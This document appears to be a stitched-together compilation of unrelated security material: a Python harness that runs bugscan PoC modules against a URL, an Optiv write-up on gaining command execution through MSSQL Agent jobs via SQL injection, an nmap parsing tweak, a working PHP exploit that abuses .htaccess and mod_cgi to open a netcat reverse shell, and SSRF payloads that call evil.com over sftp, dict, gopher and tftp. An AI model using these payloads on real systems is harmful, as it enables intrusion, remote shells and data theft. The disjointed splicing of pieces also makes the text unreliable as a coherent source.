def import_poc(pyfile,url):
poc_path = os.getcwd()+"/bugscannew/"
path = poc_path + pyfile + ".py"
filename = path.split("/")[-1].split(".py")[0]
sys.path.append(poc_path)
poc0 = imp.load_source('audit', path)
audit_function = poc0.audit
from dummy import *
audit_function.func_globals.update(locals())
ret = audit_function(url)
if ret is not None and 'None' not in ret:
#print ret
return ret
暂时没完美调用的方式.简单的贴个demo
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os
import imp,sys
import time,json
import logging,glob
import requests
from mysql_class import MySQL
"""
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1.识别具体的cms
2.从数据库获取cms--如果没有获取到考虑全部便利
3.输出结果
"""
def timestamp():
return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
`filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
`time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)
def insert(filename):
file_data = open(filename,'rb').read()
service = re.findall(r"if service.*==(.*?):",file_data)
if len(service)>0:
servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
print sqlInsert
#db.query(sql=sqlInsert)
#print servi,filename
def check(service,url):
if service == 'www':
sqlsearch = "select filename from `bugscan` where service = '%s'" %(service)
elif service != 'www':
sqlsearch = "select filename from `bugscan` where service = 'www' or service = '%s'" %(service)
print sqlsearch
if int(db.query(sql=sqlsearch))>0:
result = db.fetchAllRows()
for row in result:
#return result
for colum in row:
colum = colum.replace(".py","")
import_poc(colum,url)
def import_poc(pyfile,url):
poc_path = os.getcwd()+"/bugscannew/"
path = poc_path + pyfile + ".py"
filename = path.split("/")[-1].split(".py")[0]
sys.path.append(poc_path)
poc0 = imp.load_source('audit', path)
audit_function = poc0.audit
from dummy import *
audit_function.func_globals.update(locals())
ret = audit_function(url)
if ret is not None and 'None' not in ret:
#print ret
return ret
def whatcms(url):
headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Referer":"http://whatweb.bugscaner.com/look/",
}
"""
try:
res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
if res.status_code==200:
hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
except Exception as e:
print str(e)
return False
"""
data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
try:
respone = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
if int(respone.status_code)==200:
result = json.loads(respone.content)
if len(result["cms"])>0:
return result["cms"]
else:
return "www"
except Exception as e:
print str(e)
return "www"
if __name__ == '__main__':
#for filename in glob.glob(r'./bugscannew/*.py'):
# insert(filename)
url = "http://0day5.com/"
print check(whatcms(url),url)
The primary purpose of the Optiv attack and penetration testing (A&P) team is to simulate adversarial threat activity in an effort to test the efficacy of defensive security controls. Testing is meant to assess many facets of organizational security programs by using real-world attack scenarios. This type of assessment helps identify areas of strength, or areas of improvement regarding organizations' IT security processes, personnel and systems.
There exists a cat-and-mouse game in IT security, a never-ending arms race. Malicious actors implement new attacks; defensive controls are deployed to detect and deter those same attacks. It behooves organizations to attempt to be proactive in their defensive posture, and identify new methods of attack and preemptively put controls in place to stop them. Optiv A&P strives to maintain technical expertise in both the offensive and attack arena, along with the defensive methods used to detect and prevent attacks. To stay relevant and effective in this ever-changing threat landscape, it is paramount that organizations that specialize in assessing organizational security posture stay relevant to the tactics, techniques and procedures (TTPs) that are used by genuine threat actors. Optiv engages in proactive threat research to identify TTPs that could be used by threat actors to compromise systems or data.
Attacks that Stay Below the Radar
A goal of many attackers is to implement campaigns that go undetected. The longer an organization is unware of a breach condition, the more time an attacker has to identify and exfiltrate sensitive information, and use the compromised environment as a pivot point for more nefarious activity.
Optiv A&P implements advanced attacks in an effort to identify gaps in detective capabilities, and assist organizations in detecting the attacks.
A recent example of this activity is abusing native functionality with Microsoft SQL Server (MSSQL) to gain command and control of database servers using MSSQL Server Agent Jobs.
Microsoft SQL Server Agent
The MSSQL Server Agent is a windows service that can be used to perform automated tasks. The agent jobs can be scheduled, and run under the context of the MSSQL Server Agent service. However, using agent proxy capabilities, the jobs can be run with different credentials as well.
The Attack
During a recent engagement, a SQL injection condition was identified in a web application that was using MSSQL Server 2012. At the request of the client, Optiv performed the assessment in a surreptitious manner, making every effort to avoid detection. Optiv devised a way to take advantage of native MSSQL Server functionality to execute commands on the underlying Windows operating system. Also, the xp_cmdshell stored procedure had been disabled, and the ability to create custom stored procedures had also been limited.
Many monitoring or detection systems generate alerts when a commonly abused MSSQL stored procedure (xp_cmdshell) is used during an attack. The usage of xp_cmdshell by attackers, and penetration testers has caused many organizations to disable it, limit its ability to be used and tune alerting systems to watch for it.
Optiv identified a scenario wherein the MSSQL Server Agent could be leveraged to gain command execution on target database server. However, the server had to meet several conditions:
The MSSQL Server Agent service needs to be running.
The account that is being used must have permissions to create and execute agent jobs (in this case the database account that was running the service that had a SQL injection condition).
Optiv identified two MSSQL Agent Job subsystems that could be advantageous to attackers: the CmdExec and PowerShell subsystems. These two features can execute operating systems commands, and PowerShell respectively.
Optiv used the SQL injection entry point to create and execute the agent job. The job's command was PowerShell code that created a connection to an Optiv controlled IP address and downloaded additional PowerShell instructions that established an interactive command and control session between the database server, and the Optiv controlled server.
Here is the SQL syntax breakdown. Note, in the below download-string command, the URI is between two single quotes, not double quotes. This is to escape single quotes within SQL.
The above string is for easier copying and pasting, if you want to recreate this attack scenario.
The below quickly shows a demo on how to weaponize this attack.
The SQL syntax is URL encoded. In this specific instance the attack is being sent via an HTTP GET request, hence the necessity to URL encode the payload.
The request, with the SQL injection payload, to an HTTP GET parameter that is vulnerable to SQL injection is shown. Note the %20 (space character) added to the beginning of the payload.
Once the payload is run we can see a command and control session is established, running with the SQLSERVERAGENT account's privileges.
On the victim SQL server we can see the SQL Agent job has been created.
The below video demonstrates the full attack.
Attack Post Mortem
This attack can be leveraged to run MSSQL Server Agent jobs on other MSSQL servers, if the Agent service on the victim is configured to use an account with permissions to other MSSQL servers. Also, Agent jobs can be scheduled, and may be used as an evasive means to maintain a persistent connection to victim MSSQL servers.
In some instances, if the MSSQL Server Agent service is configured with an account that has more privileges than that of the database user, for example an Active Directory domain service account, this attack can be used by an attacker to escalate their privileges.
Mitigation
General web application hygiene should be used to prevent attack vectors like SQL injection. Use prepared statements in SQL queries within web applications, and abstracting application logic from backend databases. Employ web application firewalls to detect and block attacks on applications.
Internal systems that do not need to communicate directly with Internet hosts should be disallowed from doing so. This can prevent command and control channels from being established between internal assets, and attacker controlled endpoints. Employ strict network egress filtering.
MSSQL Server Agent jobs can be abused by any attacker that has the ability to execute SQL queries on a database server. To specifically limit the attack surface of MSSQL Server Agent jobs ensure that databases are running under the context of user accounts with the concept of least privilege. If the account that a database is running under does not have permissions to create and start MSSQL Server Agent jobs this attack is negated. Also, if the MSSQL Server Agent service is not in use it should be disabled.
for dport in dhost.findall('ports/port'):
# protocol
proto = dport.get('protocol')
# port number converted as integer
port = int(dport.get('portid'))
# state of the port
state = dport.find('state').get('state')
# reason
reason = dport.find('state').get('reason')
# name, product, version, extra info and conf if any
name = product = version = extrainfo = conf = cpe = ''
for dname in dport.findall('service'):
name = dname.get('name')
if dname.get('product'):
product = dname.get('product')
if dname.get('version'):
version = dname.get('version')
if dname.get('extrainfo'):
extrainfo = dname.get('extrainfo')
if dname.get('conf'):
conf = dname.get('conf')
for dcpe in dname.findall('cpe'):
cpe = dcpe.text
# store everything
if not proto in list(scan_result['scan'][host].keys()):
scan_result['scan'][host][proto] = {}
scan_result['scan'][host][proto][port] = {'state': state,
'reason': reason,
'name': name,
'product': product,
'version': version,
'extrainfo': extrainfo,
'conf': conf,
'cpe': cpe}
试想下如果把name以及tunnel取出来同时匹配不就好了。于是对此进行修改。410-440行
name = product = version = extrainfo = conf = cpe = tunnel =''
for dname in dport.findall('service'):
name = dname.get('name')
if dname.get('product'):
product = dname.get('product')
if dname.get('version'):
version = dname.get('version')
if dname.get('extrainfo'):
extrainfo = dname.get('extrainfo')
if dname.get('conf'):
conf = dname.get('conf')
if dname.get('tunnel'):
tunnel = dname.get('tunnel')
for dcpe in dname.findall('cpe'):
cpe = dcpe.text
# store everything
if not proto in list(scan_result['scan'][host].keys()):
scan_result['scan'][host][proto] = {}
scan_result['scan'][host][proto][port] = {'state': state,
'reason': reason,
'name': name,
'product': product,
'version': version,
'extrainfo': extrainfo,
'conf': conf,
'tunnel':tunnel,
'cpe': cpe}
for targetHost in scanner.all_hosts():
if scanner[targetHost].state() == 'up' and scanner[targetHost]['tcp']:
for targetport in scanner[targetHost]['tcp']:
#print(scanner[targetHost]['tcp'][int(targetport)])
if scanner[targetHost]['tcp'][int(targetport)]['state'] == 'open' and scanner[targetHost]['tcp'][int(targetport)]['product']!='tcpwrapped':
if scanner[targetHost]['tcp'][int(targetport)]['name']=='http' and scanner[targetHost]['tcp'][int(targetport)]['tunnel'] == 'ssl':
scanner[targetHost]['tcp'][int(targetport)]['name'] = 'https'
else:
scanner[targetHost]['tcp'][int(targetport)]['name'] = scanner[targetHost]['tcp'][int(targetport)]['name']
print(domain+'\t'+targetHosts+'\t'+str(targetport) + '\t' + scanner[targetHost]['tcp'][int(targetport)]['name'] + '\t' + scanner[targetHost]['tcp'][int(targetport)]['product']+scanner[targetHost]['tcp'][int(targetport)]['version'])
#if scanner[targetHost]['tcp'][int(targetport)]['name'] in ["https","http"]:
CGI stands for common gateway interface. It allows a web server to interact with executable files. That means you could write a web application in C, perl or python. Even web apps consisting entirely of shell scripts are possible. You can also run PHP as CGI binary instead of as a module.
What are htaccess files?
Apache supports so called virtual hosts. They are often used to run multiple websites/ sub domains on a single machine. Inside those vhost files you can change multiple settings like the sites web root or specific options for apache modules. Sometimes in a shared hosting environment you want to allow users to customize their website as much as possible without them having the ability to change settings for other users on the same host. That’s where htaccess files come in handy. They let you change a lot of vhost settings on a per-directory base. Usually it’s better (and faster) to do this directly in the virtual host files if you have access to them.
How do we exploit it?
With that knowledge how can we exploit this to get system shell access even though it’s disabled in PHP? First of all we have to check if all of the above requirements are met. As I said above more often than not it is not the case. But if we are lucky and everything is writable / enabled we can try to exploit it. What we’re trying to do is this:
We want to be able to execute CGI scripts in our current directory. This is done with Options +ExecCGI inside a htaccess file. Mod_cgi must be able to differentiate between actual CGI scripts and other files. For this purpose we have to specify an extension that it recognizes. It can be any extension you want, like .dizzle. We do this with AddHandler cgi-script .dizzle in the .htaccess file. We are now able to upload a shell script with the ending .dizzle and make it executable with the php command chmod('shell.dizzle',0777). When there’s output from our script we have to make sure to set a header with the content type first, otherwise apache will throw a statuscode 500 error. We do this simply with echo -ne "Content-Type: text/html\n\n" as first output of our shellscript. After that you can do pretty much everything you can do with a normal shellscript.
POC
<?php
$cmd = "nc -c '/bin/bash' 172.16.15.1 4444"; //command to be executed
$shellfile = "#!/bin/bash\n"; //using a shellscript
$shellfile .= "echo -ne \"Content-Type: text/html\\n\\n\"\n"; //header is needed, otherwise a 500 error is thrown when there is output
$shellfile .= "$cmd"; //executing $cmd
function checkEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
echo "$text: " . ($condition ? $yes : $no) . "<br>\n";
}
if (!isset($_GET['checked']))
{
@file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
}
else
{
$modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
$writable = is_writable('.'); //current dir writable?
$htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
checkEnabled("Is writable",$writable,"Yes","No");
checkEnabled("htaccess working",$htaccess,"Yes","No");
if(!($modcgi && $writable && $htaccess))
{
echo "Error. All of the above must be true for the script to work!"; //abort if not
}
else
{
checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
echo "Executing the script now. Check your listener <img src = 'shell.dizzle' style = 'display:none;'>"; //call the script
}
}
?>
http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/evil.com:$ nc -v -l 11111Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)SSH-2.0-libssh2_1.4.2
Dict
http://0cx.cc/ssrf.php?dict://attacker:11111/evil.com:$ nc -v -l 11111Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136)CLIENT libcurl 7.40.0
gopher
// http://0cx.cc/ssrf.php?url=http://evil.com/gopher.php<?php header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest');?>evil.com:# nc -v -l 12346Listening on [0.0.0.0] (family 0, port 12346)Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398)HIMultilinetest
TFTP
http://0cx.cc/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKETevil.com:# nc -v -u -l 12346Listening on [0.0.0.0] (family 0, port 12346)TESTUDPPACKEToctettsize0blksize512timeout6
